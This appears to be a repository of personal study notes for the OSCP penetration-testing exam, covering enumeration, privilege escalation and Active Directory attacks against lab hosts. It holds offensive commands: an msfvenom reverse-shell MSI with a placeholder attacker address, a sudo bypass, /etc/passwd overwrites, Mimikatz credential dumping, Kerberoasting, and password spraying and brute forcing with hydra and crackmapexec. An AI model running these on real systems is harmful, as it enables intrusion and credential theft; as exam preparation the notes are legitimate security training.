├── 01. Initial Enumeration.md ├── 02. Footholds.md ├── 03a. Linux Privilege Escalation.md ├── 03b. Windows Privilege Escalation.md ├── 04. Active Directory Enumeration.md ├── Exam Details.md └── I'm stuck what the fuck.md /01. Initial Enumeration.md: -------------------------------------------------------------------------------- 1 | # 01. Initial Enumeration 2 | `mkdir machine && cd machine` 3 | 4 | Compile a list of accessible hosts and add it to a `hosts.txt` file. 5 | 6 | Run one or more scans on the host: 7 | 8 | * Nmap 9 | * `sudo nmap -sV -O -A -Pn -p- -iL hosts.txt` 10 | * Autorecon 11 | * `sudo su` `/home/kali/.local/bin/autorecon -t hosts.txt` 12 | * Incursore 13 | * `mkdir incursore && cd incursore` `sudo ~/tools/incursore/incursore.sh -t all -H $IP` 14 | 15 | **Hosts with specific port open:** 16 | `nmap --open -p 111 10.11.1.0/24 -oG - | grep "/open" | awk '{ print $2 }'` 17 | 18 | --- 19 | 20 | ### Information to Note 21 | 22 | Review the completed scans and mark down any notable information in your spreadsheet: 23 | 24 | * Operating Systems 25 | * Hostnames 26 | * Open Ports 27 | * Service Versions 28 | * Anonymous or Guest access 29 | * Random port with no info? try `nc IP PORT` or `echo "version" | nc IP PORT` 30 | 31 | |IP|Hostname|OS| 32 | |---|---|---| 33 | |192.168.201.145|FILES01|Windows Server 2012| 34 | 35 | |Port|Service|Notes| 36 | |---|---|---| 37 | |21|vsftpd 2.0.8 or later|Anonymous Allowed| 38 | |22|OpenSSH for_Windows_8.1 (protocol 2.0)|Accepts Passwords| 39 | |80|Apache httpd 2.4.51 ((Win64) PHP/7.4.26)|Attendance and Payroll System| 40 | 41 | --- 42 | 43 | 44 | ### Additional Service Enumeration 45 | 46 | Quick links to information by service: 47 | 48 | |Service|Service|Service| 49 | |---|---|---| 50 | |[[21 - FTP]]|[[22 - SSH]]|[[23 - TELNET]]| 51 | |[[25 - SMTP]]|[[53 - DNS]]|[[80 - WEB]]| 52 | |[[88 - KERBEROS]]|[[111 - NFS]]|[[135 - RPC]]| 53 | |[[445 - SMB]]|[[161 - SNMP]]|[[389 - LDAP]]| 54 | |[[3389 - RDP]]|[[5985 - WINRM]]|[[SQL DBs]]| 55 | -------------------------------------------------------------------------------- /02. Footholds.md: -------------------------------------------------------------------------------- 1 | # 02. Footholds 2 | Once your spreadsheet is built with the relevant information, it's time to try and get a foothold. 3 | 4 | |Service|Service|Service| 5 | |---|---|---| 6 | |[[21 - FTP]]|[[22 - SSH]]|[[23 - TELNET]]| 7 | |[[25 - SMTP]]|[[53 - DNS]]|[[80 - WEB]]| 8 | |[[88 - KERBEROS]]|[[111 - NFS]]|[[135 - RPC]]| 9 | |[[445 - SMB]]|[[161 - SNMP]]|[[389 - LDAP]]| 10 | |[[3389 - RDP]]|[[5985 - WINRM]]|[[SQL DBs]]| 11 | 12 | --- 13 | 14 | ## What to look for 15 | 16 | * Look at the service version of ports and see if there is any low-hanging fruit or public exploits 17 | * If nothing easy is found, look deeper into the services (FTP,SMB,NFS,SMTP,WEB) 18 | * Check if there's a way to upload files 19 | * Check if there's a way to read sensitive information 20 | * Check if there's any files that give contextual hints or point towards a vulnerable service running on an unknown port 21 | * Open each service note and dig deep starting with FTP, SNMP, SMB, HTTP 22 | 23 | --- 24 | 25 | 26 | ### [[21 - FTP]] 27 | 28 | * Check version using `searchsploit` for public exploits 29 | * Check for `anonymous` login 30 | * Check for hints within the directory (i.e. `minniemouse.exe`) 31 | * Download the directory `wget -m ftp://anonymous:anonymous@192.168.215.245` 32 | * Check if there's anything that points towards uploads going to the web directory 33 | 34 | ### [[80 - WEB]] 35 | 36 | * Check version using `searchsploit` for public exploits (Traversal, SQLi, RCE) 37 | * Check to see if anything else is running using `whatweb http://10.10.10.10` (searchsploit, wordpress) 38 | * Fully enumerate with directory brute-forcing 39 | * Run multiple tools and check for file extensions, try from deeper directories 40 | * Visit site in the browser and look for any context clues 41 | * See if there's any hint for FQDN and put it in `/etc/hosts` 42 | * See if there's any hints to valid users or software in pages or source code 43 | * Test everything for default credentials or username being the password 44 | 45 | ### [[161 - SNMP]] 46 | - Enumerate community strings on v1 and v2 47 | - `sudo nmap -sU -p 161 --script snmp-brute 192.168.194.149` 48 | - Try to get useful information from accessible communities 49 | - `snmpwalk -v 1 -c public 192.168.194.149 NET-SNMP-EXTEND-MIB::nsExtendObjects` 50 | - `snmpwalk -v2c -c public 192.168.194.149 | grep ` 51 | -------------------------------------------------------------------------------- /03a. Linux Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | # 03a. Linux Privilege Escalation 2 | ## Resources 3 | - [Hacktricks Checklist](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist) 4 | - [GTFOBins](https://gtfobins.github.io/) 5 | - [Compiled Kernel Exploits](https://github.com/lucyoa/kernel-exploits) 6 | - [[Linux Privilege Escalation]] 7 | 8 | ## Low Hanging Fruit 9 | 10 | **User with valid credentials (sudo -l):** 11 | - `sudo -l` to see what binaries you can run with `sudo`, head over to [GTFOBins](https://gtfobins.github.io/) 12 | - `sudo -V` to get version, below 1.28 can use `sudo -u#-1 /bin/bash` 13 | 14 | **SUID Binaries** 15 | - `find / -perm -u=s -type f 2>/dev/null` 16 | - `find / -perm -4000 2>/dev/null` 17 | - Head over to [GTFOBins](https://gtfobins.github.io/) 18 | 19 | **Kernel Exploits:** 20 | - `uname -a` && `searchsploit` 21 | - [Compiled Kernel Exploits](https://github.com/lucyoa/kernel-exploits) 22 | - `~/exploits` and Privilege Escalation notes 23 | 24 | **Writable /etc/passwd** 25 | - `ls -la /etc/passwd` to see if you have write permissions 26 | - `openssl passwd -1 -salt hacker hacker` and replace `root` password entry (or delete `x`) 27 | - `su root` `hacker` 28 | 29 | ## Checklist 30 | 31 | - **Upgrade your shell** if it's not fully interactive 32 | - `python -c 'import pty;pty.spawn("/bin/bash")'` 33 | 34 | - `python -c 'import pty;pty.spawn("/bin/sh")'` 35 | 36 | - `python3 -c 'import pty;pty.spawn("/bin/bash")'` 37 | 38 | - `python3 -c 'import pty;pty.spawn("/bin/sh")'` 39 | 40 | - **Get system context** current user, hostname, groups 41 | - `whoami` `id` `hostname` 42 | - **Get kernel version && check for vulnerability** 43 | - `uname -a` && `searchsploit` 44 | - **Check for sudo (valid password)** 45 | - `sudo -l` `sudo -V` (below 1.28 `sudo -u#-1 /bin/bash`) 46 | - **Check for SUID Binaries** 47 | - `find / -perm -u=s -type f 2>/dev/null` 48 | - `find / -perm -4000 2>/dev/null` 49 | - **Check for users && writable /etc/passwd** 50 | - `ls -la /etc/passwd` `cat /etc/passwd` 51 | - **Check environment** 52 | - `echo $PATH` `(env || set) 2>/dev/null` `history` `cat ~/.bashrc` 53 | - **Check processes** 54 | - `ps aux` `ps -ef` `watch -n 1 "ps -aux | grep pass"` 55 | - **Check cronjobs** 56 | - `ls -lah /etc/cron*` `cat /var/log/syslog | grep cron` `cat /var/log/cron.log` 57 | - `grep "CRON" /var/log/syslog` `ls -la /etc/cron.d` `ls -la /etc/cron.hourly` 58 | - **Check your writable/usable files & file permissions** 59 | - `find / -writable -type d 2>/dev/null` 60 | - `find / -perm -u=s -type f 2>/dev/null` 61 | - `ls -la` 62 | - **Check networking & services running on localhost** 63 | - `ip a` `netstat` `ss -anp` 64 | 65 | -------------------------------------------------------------------------------- /03b. Windows Privilege Escalation.md: -------------------------------------------------------------------------------- 1 | # 03b. Windows Privilege Escalation 2 | ## Resources 3 | - [[PE Enumeration]] 4 | - [[PE Attacks]] 5 | - [Abusing Tokens](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens) 6 | - [Hacktricks Checklist](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation) 7 | 8 | ## Low Hanging Fruit 9 | **Token Abuse** 10 | - `whoami /priv` >> `SeImpersonatePrivilege` 11 | - Use `PrintSpoofer` or `GodPotato` 12 | 13 | **Check AlwaysInstallElevated Registry** 14 | - `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` if returns with `0x1` make an MSI, it'll run as SYSTEM 15 | - `msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_ip LPORT=LOCAL_PORT -f msi -o malicious.msi` 16 | - `msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi` 17 | 18 | **Cached Credentials** 19 | - `cmdkey /list` 20 | 21 | **Powershell History** 22 | - `Get-History` 23 | * `(Get-PSReadlineOption).HistorySavePath` 24 | - `type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` 25 | 26 | 27 | ## Checklist 28 | - **Get context, users, groups** 29 | - `whoami` `net user` `net group` `whoami /groups` 30 | - **Check for tokens/privileges** 31 | - `whoami /priv` >> `SeImpersonatePrivilege` 32 | - **Check registry keys** 33 | - `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated` >> `0x1` 34 | - **Check for cached creds** 35 | - `cmdkey /list` 36 | - **Check PowerShell History** 37 | - `(Get-PSReadlineOption).HistorySavePath` 38 | - **Check running services for Unquoted or Non-default locations** 39 | - `Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}` 40 | - **Check for non-default binaries looking for .dll files (like log files too)** 41 | - `C:\TEMP\???` `C:\Users\user\???` `C:\backup\???` etc 42 | - **Check for useful files in User's directory** 43 | - `Get-ChildItem -Path C:\Users\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue` 44 | - `*.log` `*.kdbx` `*.xml` literally any weird files in user's directory 45 | - **Check for scheduled tasks run by higher level** 46 | - `Get-ScheduledTask` `schtasks /query` `schtasks /query /fo LIST /v` 47 | - **Check for database files** 48 | - `Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue` 49 | - **Check for config files** 50 | - `Get-ChildItem -Path C:\ -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue` 51 | - **Check installed packages** 52 | - `Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname` 53 | - `Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname` 54 | -------------------------------------------------------------------------------- /04. Active Directory Enumeration.md: -------------------------------------------------------------------------------- 1 | # AD Enumeration 2 | ## Resources 3 | - [CME Cheatsheet](https://cheatsheet.haax.fr/windows-systems/exploitation/crackmapexec/) 4 | - [PowerView Cheatsheet](https://zflemingg1.gitbook.io/undergrad-tutorials/powerview/powerview-cheatsheet) 5 | 6 | ## Checklist 7 | 8 | ### 00. Scanning 9 | 10 | `proxychains nmap -sT 21,22,23,25,53,80,88,135,161,389,445,8000,8080,3389,5985,3306,3307,1433,5432 -iL int_hosts.txt` 11 | 12 | 13 | ### 01. Getting Users and Groups 14 | - What users belong to groups that allow remote management? (RDP, winRM) 15 | 16 | #### On Windows (Depends on Domain Policies) 17 | ##### Net 18 | - `net user /domain` all users in domain 19 | - `net user username /domain` information on a domain user 20 | - `net group /domain` 21 | - `net group groupname /domain` 22 | 23 | ##### PowerView 24 | [Cheatsheet](https://zflemingg1.gitbook.io/undergrad-tutorials/powerview/powerview-cheatsheet) 25 | **Test for SID you control with *genericall* on another user/group** 26 | - `Get-ObjectAcl -Identity "robert" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights` 27 | - `"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID` 28 | - `net user username newpassword /domain` 29 | 30 | **Kerberoastable Users** 31 | - `Get-NetUser -Domain msp.local | Where-Object {$_.servicePrincipalName} | select name, samaccountname, serviceprincipalname` 32 | 33 | **Computers in the domain** 34 | - `Get-NetComputer -Properties samaccountname, samaccounttype, operatingsystem` 35 | 36 | **List groups** 37 | - `Get-NetGroup -Domain internal.msp.local | select name` 38 | 39 | **Members of a group** 40 | - `Get-DomainGroupMember "Domain Admins" -Recurse` 41 | 42 | #### On Kali 43 | ##### SMB 44 | ###### Creds: 45 | - `cme smb 192.168.215.104 -u 'user' -p 'PASS' -d 'oscp.exam' --users` 46 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --rid-brute` 47 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' -d 'oscp.exam' --groups` 48 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-users` 49 | - `crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam` 50 | 51 | ##### LDAP 52 | ###### Creds: 53 | `ldapsearch -x -H ldap://172.16.250.10 -D 'medtech\wario' -w 'Mushroom!' -b 'DC=MEDTECH,DC=COM'` 54 | 55 | ##### RPC 56 | ###### No Creds: 57 | `rpcclient -U "" -N 10.10.10.X` 58 | ###### Creds: 59 | `rpcclient -U "medtech.com/wario%Mushroom!" 172.16.250.10` 60 | 61 | --- 62 | 63 | ### 02. Searching for Passwords 64 | #### On Windows 65 | ##### Mimikatz [cheatsheet](https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49) 66 | **Requires admin permissions** 67 | - `privilege::debug` `token::elevate` 68 | - `sekurlsa::logonpasswords` 69 | - `ekeys` `credman` `wdigest` 70 | - `lsadump::sam` 71 | - `secrets` 72 | - `.\mimikatz.exe "token::elevate" "lsadump::secrets" exit` 73 | 74 | ##### Rubeus 75 | **Requires admin permissions** 76 | **Kerberoasting** 77 | - `.\Rubeus.exe kerberoast /outfile:hashes.kerberoast` 78 | - `sudo hashcat -m 13100 hashes.kerb /usr/share/wordlists/rockyou.txt --force` 79 | **AS-REP Roasting** 80 | - `.\Rubeus.exe asreproast /nowrap` 81 | - `sudo hashcat -m 18200 hashes.asrep /usr/share/wordlists/rockyou.txt --force` 82 | 83 | ##### Cached Credentials 84 | **Database Files** 85 | - `Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue` 86 | - `keepass2john Database.kdbx > Keepasshash.txt` 87 | - `john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt` 88 | - Move the database to `~/keepass` and interact with `kpcli` 89 | 90 | **PowerShell history** 91 | - `Get-History` 92 | * `(Get-PSReadlineOption).HistorySavePath` 93 | - `type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` (Run for each user) 94 | 95 | **Interesting Files** 96 | - `cmdkey /list` 97 | - In Users directories `Get-ChildItem -Path C:\Users\ -Include *.txt,*.log,*.xml,*.ini -File -Recurse -ErrorAction SilentlyContinue` 98 | - On Filesystem `Get-ChildItem -Path C:\ -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue` 99 | - `sysprep.*` `unattend.*` 100 | - `Group Policies` `gpp-decrypt ` 101 | 102 | #### On Kali 103 | ##### LDAP 104 | - `ldapsearch -x -H ldap://172.16.250.10 -D 'medtech\wario' -w 'Mushroom!' -b 'DC=MEDTECH,DC=COM'` 105 | - `ldapsearch -x -H ldap://172.16.250.10 -D 'wario' -w 'Mushroom!' -b 'DC=MEDTECH,DC=COM'` 106 | 107 | ##### SMB 108 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' -d 'oscp.exam' --shares` 109 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-auth --shares` 110 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --sessions` 111 | - `crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --lusers` 112 | 113 | ##### SNMP 114 | - `sudo nmap -sU -p 161 --script snmp-brute 192.168.194.149` 115 | - `sudo nmap -sU -p 161 --script snmp-win32-users 192.168.194.149` 116 | - `onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 192.168.194.149` 117 | - `snmpwalk -v 1 -c public 192.168.194.149 NET-SNMP-EXTEND-MIB::nsExtendObjects` 118 | - `snmpwalk -v2c -c public 192.168.194.149 | grep ` 119 | - STRING 120 | - USER 121 | - PASSWORD 122 | - hrSWRunParameters 123 | - -i "login\|fail" 124 | - `-E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"` 125 | 126 | ##### Impacket 127 | ###### Kerberos 128 | `impacket-GetUserSPNs corp.com/meg:'VimForPowerShell123!' -dc-ip 192.168.201.70 -outputfile hashes.kerb` 129 | ###### AS-REP Roast 130 | `impacket-GetNPUsers corp.com/meg:'VimForPowerShell123!' -dc-ip 192.168.201.70 -outputfile dave.hash` 131 | 132 | 133 | 134 | --- 135 | 136 | ### 03. Compile 137 | - Make a list of users 138 | - make sure to differentiate `local` and `domain` users! 139 | - Make a list of hashes and passwords or anything you think might be a password 140 | - `domain_hashes.txt` 141 | - `domain_passwords.txt` 142 | - Check the `password policy` to make sure you're not locking yourself out 143 | - **On Windows:**`net accounts /domain` 144 | - **On Kali:** `cme smb 172.16.10.10 --pass-pol` (Might need valid creds) 145 | 146 | 147 | --- 148 | 149 | ### 04. SPRAY EVERYTHING 150 | - specify with and without domain 151 | - [[[Pass the Hash]]](https://www.n00py.io/2020/12/alternative-ways-to-pass-the-hash-pth/) 152 | 153 | #### Kerberos 154 | **Password Spray** 155 | `proxychains -q /home/kali/go/bin/kerbrute passwordspray -d oscp.exam users.txt hghgib6vHT3bVWf --dc 10.10.103.152 -vvv` 156 | **Bruteforce** 157 | `proxychains -q /home/kali/go/bin/kerbrute bruteuser -d oscp.exam jeffadmin passwords.txt --dc 10.10.103.152 -vvv` 158 | 159 | #### SMB 160 | `proxychains -q /home/kali/.local/bin/cme smb 172.16.201.10-14 172.16.201.82-83 -u users.txt -p passwords.txt -d medtech.com --continue-on-success` 161 | 162 | `proxychains -q /home/kali/.local/bin/cme smb 172.16.201.10-14 172.16.201.82-83 -u users.txt -p passwords.txt --continue-on-success` 163 | 164 | `cme smb 192.168.201.10 -u users.txt -H '' --continue-on-success` 165 | 166 | `cme smb 192.168.201.10 -u users.txt -p passwords.txt --continue-on-success --local-auth` 167 | 168 | #### RDP 169 | `hydra -V -f -l offsec -P /usr/share/wordlists/rockyou.txt rdp://192.168.232.218:3389 -u -vV -T 40 -I` 170 | 171 | `hydra -V -f -L users.txt -P passwords.txt rdp://192.168.232.218 -u -vV -T 40 -I` 172 | 173 | #### WinRM 174 | `evil-winrm -i 192.168.201.10 -u jeffadmin -p 'password'` 175 | 176 | `evil-winrm -i 192.168.201.10 -u jeffadmin -H 'HASH'` 177 | 178 | #### FTP 179 | `hydra -V -f -l offsec -P /usr/share/wordlists/rockyou.txt ftp://192.168.232.218:21 -u -vV -T 40 -I` 180 | 181 | #### SSH 182 | `hydra -V -f -l offsec -P /usr/share/wordlists/rockyou.txt ssh://192.168.232.218:22 -u -vV -T 40 -I` 183 | 184 | 185 | ## SMB Server (Windows) 186 | If you can't move file from Kali to the internal network, you can create a new share on DMZ. 187 | - Need Administrator+ on **M1** 188 | - Make sure to transfer the files into C:\temp you want to host 189 | 190 | **On M1:** 191 | `mkdir C:\temp` 192 | 193 | `New-SmbSHare -Name 'temp' -Path 'C:\temp' -FullAccess everyone` 194 | 195 | **On M2:** 196 | `net use \\10.10.10.20\temp` 197 | 198 | `copy \\10.10.10.20\temp\nc.exe C:\nc.exe` 199 | 200 | -------------------------------------------------------------------------------- /Exam Details.md: -------------------------------------------------------------------------------- 1 | ## Machines 2 | 3 | Check your exam portal for specific objectives and point values of each machine. 4 | 5 | ### Standalone (60 points) 6 | - 3 machines 7 | - 10 points for local 8 | - 10 points for proof 9 | 10 | **Note that the targets containing these files are detailed in your exam control panel.** 11 | 12 | ### AD (40 points) 13 | - 3 machines 14 | - local.txts and proof.txt on DC 15 | - Need to submit proof.txt to get any points 16 | - Only need to report if you get the proof.txt 17 | - Don't forget to go back and look for any local.txts and proof.txts 18 | 19 | ## Code 20 | - If you use a script: 21 | - post a URL to the script if you didn't modify it 22 | - post the code if you did with an explanation and highlight the parts you changed. 23 | 24 | ## Proof 25 | - Must have interactive shell as `root` `SYSTEM` `administrator` or user with admin privileges. 26 | - `cat` or `type` the flag 27 | - use `ipconfig` or `ifconfig` to print the IP address of the machine 28 | - **Screenshots must have IP of the machine and contents of proof.txt in the screenshot** 29 | 30 | ## Metasploit 31 | - Can only use metasploit/meterpreter payload on **ONE** target machine. Once you choose the target you can use it any number of times on that target, but if it doesn't work you can't choose another target. 32 | - You can use **multi/handler** on any number of targets and **msfvenom** as well. 33 | 34 | ## Point Loss 35 | You will receive no points for a specific target for the following: 36 | - Using a restricted tool 37 | - Using Metasploit Auxiliary, Exploit, or Post modules on multiple machines 38 | - Using the Meterpreter payload on multiple machines 39 | - Failure to provide the local.txt and proof.txt file contents in both the control panel and in an interactive shell screenshot 40 | - Lack of documentation 41 | 42 | 43 | ## Report Submission 44 | - **PDF** FORMAT 45 | - FILENAME: **OSCP-OS-XXXXX-Exam-Report.pdf** 46 | - **.7z** the PDF 47 | - FILENAME: **OSCP-OS-XXXXX-Exam-Report.7z** 48 | - **MAKE NOTE OF REVERTING MACHINES TO ORIGINAL PRE-TEST CONDITIONS IN THE HOUSE CLEANING SECTION** 49 | -------------------------------------------------------------------------------- /I'm stuck what the fuck.md: -------------------------------------------------------------------------------- 1 | ## SPRAY EVERYTHING 2 | - Find a new user? `ADD IT TO USERS.TXT` 3 | - Find a new password? or something that *might* be a password? `ADD IT TO PASSWORDS.TXT` 4 | - `SPRAY SPRAY SPRAY` 5 | - FTP, SSH, CME, SMB, KERBEROS, ADMIN CONSOLES, ANYTHING THAT ACCEPTS CREDENTIALS JUST TRY IT 6 | 7 | ## TRY DEFAULT CREDS AND DUMB CREDS 8 | - Find a software you've never heard of? `SEARCH FOR DEFAULT CREDENTIALS` 9 | - Find a software you have heard of? `SEARCH FOR DEFAULT CREDENTIALS` 10 | - Find a new user? `TRY THE USERNAME AS THE PASSWORD` `user:user` `admin:admin` 11 | - Can't crack a password? `TRY THE USERNAME AS THE PASSWORD` 12 | 13 | ## TRY ALTERNATE CRACKING TECHNIQUES 14 | - Hashcat didn't work? Tried with rules? `TRY IT WITH JOHN, TRY IT WITH CRACKSTATION` 15 | - John didn't work? `TRY IT WITH HASHCAT, TRY IT WITH CRACKSTATION` 16 | - Crackstation didn't work? `TRY IT WITH HASHCAT, TRY IT WITH JOHN` 17 | 18 | ## TAKE A BREATH AND START FROM THE TOP OF THE CHECKLIST YOU PROBABLY MISSED SOMETHING EASY 19 | 20 | ## TAKE A FUCKING BREAK 21 | 22 | ## DRINK SOME FUCKING WATER 23 | 24 | ## EAT SOME FUCKING FOOD 25 | 26 | ## MOVE ON TO SOMETHING ELSE AND COME BACK LATER 27 | 28 | ## AHHHHHHHHHHHHHHHHHHHHHHHH 29 | --------------------------------------------------------------------------------